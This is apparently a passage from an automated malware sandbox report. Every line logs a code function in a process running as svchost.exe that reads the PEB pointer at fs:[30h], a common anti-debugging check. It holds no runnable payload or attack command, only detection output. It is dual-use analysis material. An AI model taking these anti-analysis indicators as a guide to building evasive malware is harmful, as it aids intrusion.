            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D678E mov eax, dword ptr fs:[00000030h]8_2_037D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03762674 mov eax, dword ptr fs:[00000030h]8_2_03762674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F866E mov eax, dword ptr fs:[00000030h]8_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F866E mov eax, dword ptr fs:[00000030h]8_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A660 mov eax, dword ptr fs:[00000030h]8_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A660 mov eax, dword ptr fs:[00000030h]8_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374C640 mov eax, dword ptr fs:[00000030h]8_2_0374C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E627 mov eax, dword ptr fs:[00000030h]8_2_0374E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03766620 mov eax, dword ptr fs:[00000030h]8_2_03766620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03768620 mov eax, dword ptr fs:[00000030h]8_2_03768620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373262C mov eax, dword ptr fs:[00000030h]8_2_0373262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03772619 mov eax, dword ptr fs:[00000030h]8_2_03772619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE609 mov eax, dword ptr fs:[00000030h]8_2_037AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE6F2 mov eax, dword ptr fs:[00000030h]8_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B06F1 mov eax, dword ptr fs:[00000030h]8_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B06F1 mov eax, dword ptr fs:[00000030h]8_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A6C7 mov eax, dword ptr fs:[00000030h]8_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037666B0 mov eax, dword ptr fs:[00000030h]8_2_037666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C6A6 mov eax, dword ptr fs:[00000030h]8_2_0376C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734690 mov eax, dword ptr fs:[00000030h]8_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734690 mov eax, dword ptr fs:[00000030h]8_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376656A mov eax, dword ptr fs:[00000030h]8_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376656A mov eax, dword ptr fs:[00000030h]8_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376656A mov eax, dword ptr fs:[00000030h]8_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738550 mov eax, dword ptr fs:[00000030h]8_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738550 mov eax, dword ptr fs:[00000030h]8_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740535 mov eax, dword ptr fs:[00000030h]8_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E53E mov eax, dword ptr fs:[00000030h]8_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E53E mov eax, dword ptr fs:[00000030h]8_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E53E mov eax, dword ptr fs:[00000030h]8_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E53E mov eax, dword ptr fs:[00000030h]8_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E53E mov eax, dword ptr fs:[00000030h]8_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C6500 mov eax, dword ptr fs:[00000030h]8_2_037C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]8_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]8_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]8_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]8_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]8_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]8_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804500 mov eax, dword ptr fs:[00000030h]8_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E5E7 mov eax, dword ptr fs:[00000030h]8_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037325E0 mov eax, dword ptr fs:[00000030h]8_2_037325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C5ED mov eax, dword ptr fs:[00000030h]8_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C5ED mov eax, dword ptr fs:[00000030h]8_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037365D0 mov eax, dword ptr fs:[00000030h]8_2_037365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A5D0 mov eax, dword ptr fs:[00000030h]8_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A5D0 mov eax, dword ptr fs:[00000030h]8_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E5CF mov eax, dword ptr fs:[00000030h]8_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E5CF mov eax, dword ptr fs:[00000030h]8_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037545B1 mov eax, dword ptr fs:[00000030h]8_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037545B1 mov eax, dword ptr fs:[00000030h]8_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B05A7 mov eax, dword ptr fs:[00000030h]8_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B05A7 mov eax, dword ptr fs:[00000030h]8_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B05A7 mov eax, dword ptr fs:[00000030h]8_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E59C mov eax, dword ptr fs:[00000030h]8_2_0376E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03732582 mov eax, dword ptr fs:[00000030h]8_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03732582 mov ecx, dword ptr fs:[00000030h]8_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03764588 mov eax, dword ptr fs:[00000030h]8_2_03764588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375A470 mov eax, dword ptr fs:[00000030h]8_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375A470 mov eax, dword ptr fs:[00000030h]8_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375A470 mov eax, dword ptr fs:[00000030h]8_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BC460 mov ecx, dword ptr fs:[00000030h]8_2_037BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372645D mov eax, dword ptr fs:[00000030h]8_2_0372645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375245A mov eax, dword ptr fs:[00000030h]8_2_0375245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E443 mov eax, dword ptr fs:[00000030h]8_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A430 mov eax, dword ptr fs:[00000030h]8_2_0376A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E420 mov eax, dword ptr fs:[00000030h]8_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E420 mov eax, dword ptr fs:[00000030h]8_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372E420 mov eax, dword ptr fs:[00000030h]8_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372C427 mov eax, dword ptr fs:[00000030h]8_2_0372C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]8_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]8_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]8_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]8_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]8_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]8_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B6420 mov eax, dword ptr fs:[00000030h]8_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03768402 mov eax, dword ptr fs:[00000030h]8_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03768402 mov eax, dword ptr fs:[00000030h]8_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03768402 mov eax, dword ptr fs:[00000030h]8_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037304E5 mov ecx, dword ptr fs:[00000030h]8_2_037304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037644B0 mov ecx, dword ptr fs:[00000030h]8_2_037644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BA4B0 mov eax, dword ptr fs:[00000030h]8_2_037BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037364AB mov eax, dword ptr fs:[00000030h]8_2_037364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372CB7E mov eax, dword ptr fs:[00000030h]8_2_0372CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DEB50 mov eax, dword ptr fs:[00000030h]8_2_037DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E4B4B mov eax, dword ptr fs:[00000030h]8_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E4B4B mov eax, dword ptr fs:[00000030h]8_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C6B40 mov eax, dword ptr fs:[00000030h]8_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C6B40 mov eax, dword ptr fs:[00000030h]8_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FAB40 mov eax, dword ptr fs:[00000030h]8_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D8B42 mov eax, dword ptr fs:[00000030h]8_2_037D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375EB20 mov eax, dword ptr fs:[00000030h]8_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375EB20 mov eax, dword ptr fs:[00000030h]8_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F8B28 mov eax, dword ptr fs:[00000030h]8_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F8B28 mov eax, dword ptr fs:[00000030h]8_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AEB1D mov eax, dword ptr fs:[00000030h]8_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738BF0 mov eax, dword ptr fs:[00000030h]8_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738BF0 mov eax, dword ptr fs:[00000030h]8_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738BF0 mov eax, dword ptr fs:[00000030h]8_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375EBFC mov eax, dword ptr fs:[00000030h]8_2_0375EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BCBF0 mov eax, dword ptr fs:[00000030h]8_2_037BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DEBD0 mov eax, dword ptr fs:[00000030h]8_2_037DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03750BCB mov eax, dword ptr fs:[00000030h]8_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03750BCB mov eax, dword ptr fs:[00000030h]8_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03750BCB mov eax, dword ptr fs:[00000030h]8_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730BCD mov eax, dword ptr fs:[00000030h]8_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730BCD mov eax, dword ptr fs:[00000030h]8_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730BCD mov eax, dword ptr fs:[00000030h]8_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740BBE mov eax, dword ptr fs:[00000030h]8_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740BBE mov eax, dword ptr fs:[00000030h]8_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E4BB0 mov eax, dword ptr fs:[00000030h]8_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E4BB0 mov eax, dword ptr fs:[00000030h]8_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03804A80 mov eax, dword ptr fs:[00000030h]8_2_03804A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037ACA72 mov eax, dword ptr fs:[00000030h]8_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037ACA72 mov eax, dword ptr fs:[00000030h]8_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376CA6F mov eax, dword ptr fs:[00000030h]8_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376CA6F mov eax, dword ptr fs:[00000030h]8_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376CA6F mov eax, dword ptr fs:[00000030h]8_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DEA60 mov eax, dword ptr fs:[00000030h]8_2_037DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]8_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]8_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]8_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]8_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]8_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]8_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03736A50 mov eax, dword ptr fs:[00000030h]8_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740A5B mov eax, dword ptr fs:[00000030h]8_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740A5B mov eax, dword ptr fs:[00000030h]8_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03754A35 mov eax, dword ptr fs:[00000030h]8_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03754A35 mov eax, dword ptr fs:[00000030h]8_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376CA38 mov eax, dword ptr fs:[00000030h]8_2_0376CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376CA24 mov eax, dword ptr fs:[00000030h]8_2_0376CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375EA2E mov eax, dword ptr fs:[00000030h]8_2_0375EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BCA11 mov eax, dword ptr fs:[00000030h]8_2_037BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376AAEE mov eax, dword ptr fs:[00000030h]8_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376AAEE mov eax, dword ptr fs:[00000030h]8_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730AD0 mov eax, dword ptr fs:[00000030h]8_2_03730AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03764AD0 mov eax, dword ptr fs:[00000030h]8_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03764AD0 mov eax, dword ptr fs:[00000030h]8_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03786ACC mov eax, dword ptr fs:[00000030h]8_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03786ACC mov eax, dword ptr fs:[00000030h]8_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03786ACC mov eax, dword ptr fs:[00000030h]8_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738AA0 mov eax, dword ptr fs:[00000030h]8_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03738AA0 mov eax, dword ptr fs:[00000030h]8_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03786AA4 mov eax, dword ptr fs:[00000030h]8_2_03786AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03768A90 mov edx, dword ptr fs:[00000030h]8_2_03768A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA80 mov eax, dword ptr fs:[00000030h]8_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D4978 mov eax, dword ptr fs:[00000030h]8_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D4978 mov eax, dword ptr fs:[00000030h]8_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BC97C mov eax, dword ptr fs:[00000030h]8_2_037BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03756962 mov eax, dword ptr fs:[00000030h]8_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03756962 mov eax, dword ptr fs:[00000030h]8_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03756962 mov eax, dword ptr fs:[00000030h]8_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0377096E mov eax, dword ptr fs:[00000030h]8_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0377096E mov edx, dword ptr fs:[00000030h]8_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0377096E mov eax, dword ptr fs:[00000030h]8_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B0946 mov eax, dword ptr fs:[00000030h]8_2_037B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B892A mov eax, dword ptr fs:[00000030h]8_2_037B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C892B mov eax, dword ptr fs:[00000030h]8_2_037C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BC912 mov eax, dword ptr fs:[00000030h]8_2_037BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728918 mov eax, dword ptr fs:[00000030h]8_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03728918 mov eax, dword ptr fs:[00000030h]8_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE908 mov eax, dword ptr fs:[00000030h]8_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AE908 mov eax, dword ptr fs:[00000030h]8_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037629F9 mov eax, dword ptr fs:[00000030h]8_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037629F9 mov eax, dword ptr fs:[00000030h]8_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BE9E0 mov eax, dword ptr fs:[00000030h]8_2_037BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A9D0 mov eax, dword ptr fs:[00000030h]8_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A9D0 mov eax, dword ptr fs:[00000030h]8_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A9D0 mov eax, dword ptr fs:[00000030h]8_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A9D0 mov eax, dword ptr fs:[00000030h]8_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A9D0 mov eax, dword ptr fs:[00000030h]8_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373A9D0 mov eax, dword ptr fs:[00000030h]8_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037649D0 mov eax, dword ptr fs:[00000030h]8_2_037649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FA9D3 mov eax, dword ptr fs:[00000030h]8_2_037FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C69C0 mov eax, dword ptr fs:[00000030h]8_2_037C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B89B3 mov esi, dword ptr fs:[00000030h]8_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B89B3 mov eax, dword ptr fs:[00000030h]8_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B89B3 mov eax, dword ptr fs:[00000030h]8_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
